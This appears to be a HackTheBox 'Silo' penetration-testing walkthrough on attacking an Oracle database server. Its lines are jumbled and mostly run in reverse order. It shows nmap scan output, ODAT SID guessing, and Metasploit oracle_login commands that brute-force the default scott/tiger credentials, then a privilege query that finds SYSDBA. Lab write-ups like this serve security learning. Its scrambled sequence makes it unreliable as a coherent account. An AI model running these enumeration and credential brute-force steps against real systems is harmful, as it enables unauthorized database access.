In order to achieve this easily, we can use a tool called ODAT (Oracle Database Attack Tool). In order for us to gain shell access, we might need to escalate our privilege to DBA first and perform some known Oracle attacks.
SQL> SELECT * FROM user_role_privs
As you can see, scott is a low-privilege user on the system.
TNS for 64-bit Windows: Version 11.2.0.2.0 - Production
For starters, we can query for user privileges and roles.
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
Now that we have a valid SID and credentials, we can connect to the database for manual enumeration. Think of it as something like sudo - it gives you extra flexibility and higher privileges in case you want to do some database altering, user administration and the list continues. As it turns out, scott is also granted the SYSDBA privilege. Valid credentials mean that we can connect to the XE instance and start querying the database for possible information.
Auxiliary module execution completed
By the way, we can also figure this one out if we research common default Oracle credentials.
Found user/pass of: scott/tiger on 10.10.10.82 with sid XE
Msf5 auxiliary (admin/oracle/oracle_login ) > run -j
Auxiliary module running as background job 0.
Msf5 auxiliary (admin/oracle/oracle_login ) > set SID XE
Msf5 auxiliary (admin/oracle/oracle_login ) > set RHOST 10.10.10.82
Next, we’ll need to identify valid credentials in order to authenticate to the database.
For this task, we can use a Metasploit auxiliary module called oracle_login.
SIDs found on the 10.10.10.82:1521 server: SAMPLE,SCAN4,XE,XEXDB
Credential brute force
Based on the results, we identified four SIDs.
Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521 )
'XE' is a valid SID.
Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
100% |#| Time: 00:10:55
We can use ODAT’s sidguesser to discover )] #.
- obtain a user account (likely through bruteforcing).
- Discover SIDs (Basically oracles version a unique “database instance”).
ODAT is an open source penetration test tool designed to attack and audit the security of Oracle Database servers. To continue, we will audit this Oracle database with the ODAT tool.
With the result of the previous scan, we can see that this server is probably running Windows Server 2008 R2 and that port 80 (Microsoft IIS httpd 8.5) is enabled.
For this penetration test, we are going to focus on port 1521, which appears to be an oracle-tns service.
Nmap done: 1 IP address (1 host up ) scanned in 171.99 seconds
|_ Message signing enabled but not required
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012 CPE: cpe:/o:microsoft:windows
)] # nmap -sS -T4 -sV -sC 10.10.10.82
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized )
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49160/tcp open oracle-tns Oracle TNS listener (requires service name )
49161/tcp open msrpc Microsoft Windows RPC
How to perform a privilege escalation using the pass-the-hash technique
As always, we will start by enumerating our victim. For this we will perform a simple scan with Nmap, in the following way.
How to perform a simple port scan with Nmap.
I am not responsible for any misuse of this content. If you want to practice doing the different activities that I will present during this tutorial, I invite you to check the machine Silo from HackTheBox.
Before starting I want to clarify that all my published content is done for educational, informative and ethical purposes.
Today, we are going to perform a penetration test against an Oracle database server.